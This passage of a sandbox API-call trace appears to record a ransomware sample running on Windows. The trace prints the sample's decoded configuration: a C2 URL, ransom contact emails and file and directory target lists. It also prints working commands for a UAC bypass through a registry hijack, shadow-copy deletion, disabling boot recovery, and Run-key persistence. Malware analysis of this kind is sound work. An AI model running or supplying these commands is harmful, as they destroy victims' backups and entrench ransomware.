hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0096.923] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0096.923] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0096.923] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0096.923] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0096.923] LockResource (hResData=0x50d55c) returned 0x50d55c [0096.923] FreeResource (hResData=0x50d55c) returned 0 [0096.923] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.923] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.923] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.923] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.923] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.924] FreeResource (hResData=0x50d64c) returned 0 [0096.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0096.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCurrentThreadId () returned 0xb78 [0096.924] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.924] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0096.924] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0096.924] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0096.926] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0096.927] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0096.928] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0096.928] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0096.929] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0096.930] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0096.930] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0096.931] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0096.933] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0096.933] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0096.933] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0096.933] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0096.933] LockResource (hResData=0x50d72c) returned 0x50d72c [0096.933] FreeResource (hResData=0x50d72c) returned 0 [0096.933] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.933] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.933] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.933] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.933] FreeResource (hResData=0x50d64c) returned 0 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] GetCurrentThreadId () returned 0xb78 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0096.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThreadId () returned 0xb78 [0096.934] GetCurrentThread () returned 0xfffffffe [0096.934] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0096.934] GetLastError () returned 0x3f0 [0096.934] GetCurrentProcess () returned 0xffffffff [0096.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0096.934] CloseHandle (hObject=0xb8) returned 1 [0096.934] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0096.934] EqualSid (pSid1=0x156448*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0096.934] GetCurrentProcess () returned 0xffffffff [0096.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0096.934] GetLastError () returned 0x7a [0096.934] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x1576e8 [0096.934] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x1576e8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x1576e8, ReturnLength=0x12fc64) returned 1 [0096.934] GetSidSubAuthorityCount (pSid=0x1576f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x1576f1 [0096.934] GetSidSubAuthority (pSid=0x1576f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x1576f8 [0096.934] LocalFree (hMem=0x1576e8) returned 0x0 [0096.934] CloseHandle (hObject=0xb8) returned 1 [0096.934] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0096.934] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0096.934] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0096.935] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0096.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.937] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0096.937] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0096.937] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0096.937] LockResource (hResData=0x516824) returned 0x516824 [0096.937] FreeResource (hResData=0x516824) returned 0 [0096.937] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.937] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.937] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.937] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.937] FreeResource (hResData=0x50d64c) returned 0 [0096.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] GetCurrentThreadId () returned 0xb78 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0096.937] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0096.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, 